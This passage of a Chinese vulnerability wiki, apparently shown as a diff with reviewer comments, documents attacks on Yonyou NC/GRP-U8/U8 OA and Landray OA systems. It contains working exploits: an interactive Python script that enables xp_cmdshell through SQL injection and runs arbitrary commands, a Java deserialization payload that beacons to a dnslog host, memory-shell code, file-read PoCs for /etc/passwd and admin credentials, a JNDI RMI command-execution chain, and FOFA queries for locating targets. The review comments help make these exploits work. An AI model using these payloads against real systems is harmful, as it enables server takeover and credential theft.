![yongyou-7-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-7-3.png)
- 注意:大部分默认是不开启 xp_cmdshell 模块的
![yongyou-7-4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-7-4.png)
可以使用如下方法打开**xp_cmdshell方法**
将如下POST数据按顺序发送(**注意 master 改为当前数据库名**)
```xml
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">use master</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
```xml
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec sp_configure 'show advanced options',1</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
```xml
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">reconfigure</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
```xml
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec sp_configure 'xp_cmdshell',1</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
```xml
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">reconfigure</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
- 发送如上实际为执行SQL语句打开 xp_cmdshell
use master;
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
再发送以下数据可成功使用(也可能失败)
```xml
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell "whoami"</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
```
- 执行过程中报错 java.sql.SQLException【错误代码: 0; 相关信息:xxxxxx】不用理会
发送请求后再使用此模块则会成功请求执行系统命令
## 漏洞POC
```python
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import requests
import re
import sys
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 用友GRP-U8行政事业内控管理软件 \033[0m')
print('+ \033[36m使用格式: python3 CNNVD-201610-923.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+ \033[36m(Y/N) >>> Y or N \033[0m')
print('+ \033[36mcmd >>> ipconfig \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
check_url = target_url + "/Proxy"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = """cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select 1,user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>"""
try:
print("\033[32m[o] 正在执行SQL语句:select 1,user,db_name(),host_name(),@@version...\033[0m")
response = requests.post(url=check_url, headers=headers, data=data, timeout=10)
row_1 = '<ROW COLUMN1="1"'
row_2 = r'COLUMN2="(.*?)"'
row_3 = r'COLUMN3="(.*?)"'
row_4 = r'COLUMN4="(.*?)"'
row_5 = r'COLUMN5="(.*?)"'
if row_1 in response.text and "服务器错误信息null" not in response.text:
db_user = re.findall(row_2, response.text)[0]
db_name = re.findall(row_3, response.text)[0]
db_host = re.findall(row_4, response.text)[0]
db_vers = re.findall(row_5, response.text)[0]
print("\033[32m[o] 存在漏洞,漏洞响应为:\033[0m")
print("\033[32m >> 数据库用户为:{}\033[0m".format(db_user))
print("\033[32m >> 数据库名为:{}\033[0m".format(db_name))
print("\033[32m >> 数据库主机名为:{}\033[0m".format(db_host))
print("\033[32m >> 数据库版本为:{}\033[0m".format(db_vers))
return db_name
else:
print("\033[31m[x] 漏洞已被修复 \033[0m")
sys.exit(0)
except:
print("\033[31m[x] 请求失败 \033[0m")
sys.exit(0)
def xp_cmdshell_open(target_url, db_name):
open_sql = ["use {}".format(db_name),"exec sp_configure 'show advanced options',1","reconfigure","exec sp_configure 'xp_cmdshell',1","reconfigure"]
num = 1
for sql in open_sql:
open_url = target_url + "/Proxy"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">{}</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'.format(sql)
try:
print("\033[32m[o] 正在执行SQL语句:{}...\033[0m".format(sql))
response = requests.post(url=open_url, headers=headers, data=data, timeout=10)
num = num + 1
if num == 5 :
POC_2(target_url, db_name)
except:
print("\033[31m[x] 开启 xp_cmdsheall 失败 \033[0m")
sys.exit(0)
def POC_2(target_url, db_name):
db_name = db_name
sql_cmd_url = target_url + "/Proxy"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = """cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell "whoami"</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>"""
try:
print("\033[32m[o] 正在执行SQL语句:exec xp_cmdshell 'whoami'...\033[0m")
response = requests.post(url=sql_cmd_url, headers=headers, data=data, timeout=10)
if 'exec xp_cmdshell' in response.text:
print("\033[31m[x] 数据库未开启 xp_cmdshell 模块\033[0m")
sqlcmd_open = str(input("\033[35m是否开启 xp_cmdshell\n(Y/N) >>> \033[0m"))
if sqlcmd_open == 'Y' or sqlcmd_open == 'y':
xp_cmdshell_open(target_url, db_name)
else:
print("\033[31m[x] 停止开启 xp_cmdshell \033[0m")
sys.exit(0)
else:
whoami = re.findall(r'output="(.*?)"', response.text)[0]
print("\033[32m[o] 成功执行SQL语句:exec xp_cmdshell 'whoami'...\n>>> {}\033[0m".format(whoami))
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)
def POC_3(target_url, cmd):
vuln_url = target_url + "/Proxy"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell "{}"</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'.format(cmd)
try:
print("\033[32m[o] 正在执行SQL语句:exec xp_cmdshell '{}'...\033[0m".format(cmd))
response = requests.post(url=vuln_url, headers=headers, data=data, timeout=10)
data = re.findall(r'output="(.*?)"', response.text)
for i in data:
print("\033[32m >>> {}\033[0m".format(i))
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
db_name = POC_1(target_url)
POC_2(target_url, db_name)
while True:
cmd = input("\033[35mCmd >>> \033[0m")
if cmd == "exit":
sys.exit(0)
else:
POC_3(target_url, cmd)
```
![yongyou-7-5](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-7-5.png)
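Review bot: in `xp_cmdshell_open()` the counter starts at 1 and `POC_2()` is called when `num == 5`, which happens after the fourth statement (`exec sp_configure 'xp_cmdshell',1`) is sent and before the final `reconfigure`; the command test therefore runs one step early. Move the `POC_2()` call after the loop. The 漏洞描述 also says the issue is XXE (`应用程序解析XML输入时没有进制外部实体的加载`) while the title and every request show a SQL statement carried in the `Data` element; describe it as SQL injection through the XML-wrapped `AS_DataRequest` call (and `进制` is a typo for `禁止`). In the raw request, `Content-Type`, `User-Agent` and `Host` are fused onto one line and `Accept: Accept: */*` is doubled.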

View File

@ -0,0 +1,28 @@
# 用友 NC NCFindWeb 任意文件读取漏洞
## 漏洞描述
用友NC存在任意文件读取漏洞攻击者通过漏洞可读取服务器敏感文件
## 漏洞影响
```
用友NC
```
## FOFA
```
icon_hash="1085941792"
```
## 漏洞复现
登陆页面
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628351304159-f00b4a4f-a104-40f4-a8bf-1ea00cf72c98.png)
验证POC **/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml**
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628351371286-e2898425-5e54-438a-b5eb-4f20eed3636b.png)
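Review bot: this entry and `用友 ERP-NC NCFindWeb 目录遍历漏洞` describe the same endpoint, `/NCFindWeb?service=IPreAlertConfigService&filename=`, once with an empty `filename` and once with `WEB-INF/web.xml`; either merge them or cross-link, and state here that the path is resolved relative to the web application so readers know what is reachable. The two FOFA fingerprints also differ (`app="用友-UFIDA-NC"` vs `icon_hash="1085941792"`); keep both in whichever entry survives.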

View File

@ -0,0 +1,36 @@
# 用友 NC XbrlPersistenceServlet反序列化
## 漏洞描述
用友 NC XbrlPersistenceServlet反序列化漏洞
## 漏洞影响
```
用友NC
```
## 漏洞复现
```python
攻击队利用用友nc反序列利用
目前测试影响版本nc6.5
漏洞url为
/service/~xbrl/XbrlPersistenceServlet
poc
import requests
import threadpool
import urllib3
import sys
import base64
ip = ""
dnslog = "\x79\x37\x64\x70\" #dnslog把字符串转16进制替换该段测试用的ceye.io可以回显
data = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x03\x4c\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x03\x4c\x00\x08\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x71\x00\x7e\x00\x03\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x03\x78\x70\xff\xff\xff\xff\x00\x00\x00\x50\x74\x00\x11"+dnslog+"\x3a\x38\x30\x74\x00\x00\x74\x00\x0e"+dnslog+"\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f"+dnslog+"\x3a\x38\x30\x78"
uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.post("http://+"ip"+/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
print (req.text)
```
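Review bot: the block does not run as written: `dnslog = "\x79\x37\x64\x70\"` ends in an escaped quote, so the string literal never closes, and `"http://+"ip"+/service/~xbrl/XbrlPersistenceServlet"` is not valid concatenation (it should be `"http://" + ip + "/service/~xbrl/XbrlPersistenceServlet"`). More importantly, the serialized `java.net.URL` carries length-prefixed strings (`\x00\x11` before the `host:80` authority, `\x00\x0e` before the host, `\x00\x18` before the full `http://host:80` URL, i.e. a 14-character host), so substituting a dnslog domain of a different length without recomputing those bytes yields a stream that fails to deserialize; the comment `把字符串转16进制替换该段` should say this, or the script should build the payload with the lengths derived from the domain. The prose lines inside the python fence (`攻击队利用用友nc反序列利用` through `poc`) belong outside it, and `threadpool`, `urllib3`, `sys` and `base64` are imported but unused.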

View File

@ -0,0 +1,31 @@
# 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
## 漏洞描述
用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞通过BeanShell 执行远程命令获取服务器权限
## 漏洞影响
```
用友 NC
```
## FOFA
```
icon_hash="1085941792"
```
## 漏洞复现
访问页面如下
![yongyou-4-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-4-1.png)
漏洞Url为
```plain
/servlet/~ic/bsh.servlet.BshServlet
```
![yongyou-4-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-4-2.png)
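Review bot: the entry gives only the servlet path `/servlet/~ic/bsh.servlet.BshServlet` and a screenshot; the request that produced the screenshot (method, the parameter carrying the BeanShell script, and what the response looks like) is not in the text, so the page cannot be reproduced without the image. Add the request as the other entries do, and add a 参考文章 for the public analysis this follows.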

View File

@ -0,0 +1,84 @@
# 用友 NC 反序列化RCE漏洞
## 漏洞描述
用友NC 存在反序列化 RCE漏洞攻击者可利用控制服务器
## 漏洞影响
```
用友 NC
```
## 漏洞复现
首先从任意文件上传说起
任意文件上传分析代码在`servlet.FileReceiveServlet`。在这里我们可以看到从请求中读取流然后转换为map类型并读取上传文件的路径。然后再读取待上传的文件。
![yongyou-5-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-5-1.png)
而网上很多poc大多都是基于此漏洞利用反序列化上传一个文件到服务器。
这也就是去年的那个任意文件上传的反序列化漏洞。但是但是这个漏洞本质是一个反序列化漏洞。而且某C的classpath中也存在apache commonscollections库我们可以利用这个库直接执行命令或者内存马。岂不是比任意文件上传舒服多了。
**内存马**
老样子在反序列化中想执行任意代码一般都依靠xalan这个库。这次也不例外。
植入内存马关键在于我们怎样找到context只有找到context我们才可以添加filter。好在某c中我们只需要通过下面的代码既可以获取当前context不需要从tomcat中获取context
```java
Object obj = 改动Locator.getInstance().lookup("ServletContext");
Field contextField = obj.getClass().getDeclaredField("context");
contextField.setAccessible(true);
obj = contextField.get(obj);
Field contextField1 = obj.getClass().getDeclaredField("context");
contextField1.setAccessible(true);
addFitlertoTomcat(contextField1.get(obj));
```
剩下的就是常规操作,可以看我之前的内存马模型,基本不需要很大的改动即可完美适配。
![yongyou-5-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-5-2.png)
**回显**
我们只需要找到这样一个servlet即存在反序列化的readObject又将错误信息写入到response中
不难看出 uploadServlet 就很满足这个需求。
```plain
out = new ObjectOutputStream(output);
in = new ObjectInputStream(request.getInputStream());
String dsName = (String)in.readObject();
}
} catch (Exception var14) {
var14.printStackTrace();
if (out == null) {
throw new ServletException(var14);
}
out.writeObject(var14);
```
如果出错的话将错误信息通过序列化写入到response中。好处在于我们不需要麻烦的去找tomcat的response对象。
所以我们将反序列化的payload发送给uploadServlet即可。然后我们只需要读取响应即可拿到服务器命令执行的回显结果。客户端代码可以这样写
```java
ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(r));
Exception e = (Exception) objectInputStream.readObject();
Object obj = e.getCause();
Field targetF = obj.getClass().getDeclaredField("target");
targetF.setAccessible(true);
obj = targetF.get(obj);
Field msgF = obj.getClass().getSuperclass().getDeclaredField("detailMessage");
msgF.setAccessible(true);
String msg = msgF.get(obj).toString();
System.out.println(msg);
```
## 参考文章
https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w
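Review bot: the java block starts with `Object obj = 改动Locator.getInstance().lookup("ServletContext");`, where `改动` has been pasted into the class name; if the name was deliberately redacted, mark it as a placeholder in a comment, otherwise restore it, because the snippet does not compile as shown. The second block is a decompiler excerpt that begins inside a try and ends mid-method (unbalanced braces), and the client code reads from `r` without saying that it is the raw response body returned by uploadServlet; a line of context for each would help. `addFitlertoTomcat` is the author's own helper, referenced but never shown, so say where it comes from.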

View File

@ -0,0 +1,53 @@
# 用友 NCCloud FS文件管理SQL注入
## 漏洞描述
用友 NCCloud FS文件管理登录页面对用户名参数没有过滤存在SQL注入
## 漏洞影响
```
用友 NCCloud
```
## FOFA
```
"NCCloud"
```
## 漏洞描述
登录页面如下
![yongyou-6-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-6-1.png)
在应用中存在文件服务器管理登录页面
```plain
http://xxx.xxx.xxx.xxx/fs/
```
![yongyou6-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou6-2.png)
登录请求包如下
```plain
GET /fs/console?username=123&password=%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D HTTP/1.1
Host: xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: JSESSIONID=2CF7A25EE7F77A064A9DA55456B6994D.server; JSESSIONID=0F83D6A0F3D65B8CD4C26DFEE4FCBC3C.server
Connection: close
```
使用Sqlmap对**username参数** 进行SQL注入
```plain
sqlmap -r sql.txt -p username
```
![yongyou-6-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-6-3.png)
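Review bot: the heading `## 漏洞描述` appears twice; the second one (above `登录页面如下`) should be `## 漏洞复现` to match the other entries. The captured request still carries two `JSESSIONID` values from the tester's session in the `Cookie` header; strip them, they are not needed for the injection and `sqlmap -r sql.txt -p username` will replay them. The `password` value is an opaque base64 blob; say whether any value works or whether it must be a validly encrypted string for the vulnerable query to run.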

View File

@ -0,0 +1,79 @@
# 用友 U8 OA test.jsp SQL注入漏洞
## 漏洞描述
用友 U8 OA test.jsp文件存在 SQL注入漏洞由于与致远OA使用相同的文件于是存在了同样的漏洞
## 漏洞影响
```
用友 U8 OA
```
## FOFA
```
"用友U8-OA"
```
## 漏洞复现
可参考 文章
[致远OA A6 test.jsp SQL注入漏洞](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/致远OA/致远OA A6 test.jsp SQL注入漏洞.html)
登录页面如下
![yongyou-1-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-1-1.png)
POC
```plain
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
```
![yongyou-1-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-1-2.png)
利用方法与致远OA 的SQL注入类似
## 漏洞POC
```python
import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mTitle : 用友 U8 OA test.jsp SQL注入漏洞 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mFile >>> ip.txt \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
if "c4ca4238a0b923820dcc509a6f75849b" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {}存在漏洞 \n[o] 响应地址: {} \033[0m".format(target_url, vuln_url))
else:
print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
except Exception as e:
print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url))
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
```
![yongyou-1-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-1-3.png)
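Review bot: the banner printed by `title()` says `使用格式: python3 poc.py` / `File >>> ip.txt`, but `__main__` prompts for a single URL and calls `POC_1` once; either implement the file mode or fix the banner. `random`, `re` and `sys` are imported and unused. The check itself is sound: `md5(1)` is `c4ca4238a0b923820dcc509a6f75849b`, so the string match is a real injection oracle rather than a status-code guess.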

View File

@ -0,0 +1,77 @@
# 蓝凌OA admin.do JNDI远程命令执行
## 漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限
## 漏洞影响
- 蓝凌OA
## FOFA
- app="Landray-OA系统"
## 漏洞复现
利用 **蓝凌OA custom.jsp 任意文件读取漏洞** 读取配置文件
```plain
/WEB-INF/KmssConfig/admin.properties
```
发送请求包
```plain
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
```
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090125006.png)
获取password后使用 DES方法 解密,默认密钥为 **kmssAdminKey**
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090125061.png)
访问后台地址使用解密的密码登录
```plain
http://xxx.xxx.xxx.xxx/admin.do
```
![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090126340.png)
使用工具执行命令
https://github.com/welk1n/JNDI-Injection-Exploit
```plain
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
```
运行工具监听端口 ping dnslog测试 命令执行 (蓝凌OA 默认使用的是 JDK 1.7)
```plain
POST /admin.do HTTP/1.1
Host:
Cookie: JSESSIONID=90EA764774514A566C480E9726BB3D3F; Hm_lvt_9838edd365000f753ebfdc508bf832d3=1620456866; Hm_lpvt_9838edd365000f753ebfdc508bf832d3=1620459967
Content-Length: 70
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Origin:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
method=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:1099/cbdsdg
```
![4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090126051.png)
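Review bot: the 漏洞描述 opens by calling this an arbitrary file read (`存在任意文件读取漏洞`), which is the custom.jsp entry; this page is about the `method=testDbConn&datasource=rmi://...` JNDI lookup in `admin.do`, reachable once the DES-encrypted admin password from `/WEB-INF/KmssConfig/admin.properties` (default key `kmssAdminKey`) is recovered. Lead the description with that chain. The parenthetical `蓝凌OA 默认使用的是 JDK 1.7` should say why it matters: whether the `rmi://` reference served by `JNDI-Injection-Exploit` can load a remote class depends on the target JDK version, so the reader should expect the RMI vector to fail on newer runtimes and try the tool's other options. The captured request also carries a live `JSESSIONID` and Baidu `Hm_*` analytics cookies; scrub them.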

View File

@ -0,0 +1,103 @@
# 蓝凌OA custom.jsp 任意文件读取漏洞
## 漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。
## 漏洞影响
```
蓝凌OA
```
## FOFA
```
app="Landray-OA系统"
```
## 漏洞复现
出现漏洞的文件为 custom.jsp
```jsp
<%@page import="com.landray.kmss.util.ResourceUtil"%>
<%@page import="net.sf.json.JSONArray"%>
<%@page import="net.sf.json.JSONObject"%>
<%@ page language="java" pageEncoding="UTF-8"%>
<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>
<%
JSONObject vara =
JSONObject.fromObject(request.getParameter("var"));
JSONObject body = JSONObject.fromObject(vara.get("body"));
%>
<c:import url='<%=body.getString("file") %>'>
<c:param name="var" value="${ param['var'] }"></c:param>
</c:import>
```
请求包为
```plain
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
var={"body":{"file":"file:///etc/passwd"}}
```
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090128987.png)
## 漏洞POC
```python
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import base64
import requests
import random
import re
import json
import sys
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 蓝凌OA 任意文件读取 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = 'var={"body":{"file":"file:///etc/passwd"}}'
try:
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
print("\033[36m[o] 正在请求 {}/sys/ui/extend/varkind/custom.jsp \033[0m".format(target_url))
if "root:" in response.text and response.status_code == 200:
print("\033[36m[o] 成功读取 /etc/passwd \n[o] 响应为:{} \033[0m".format(response.text))
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
```
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090129010.png)
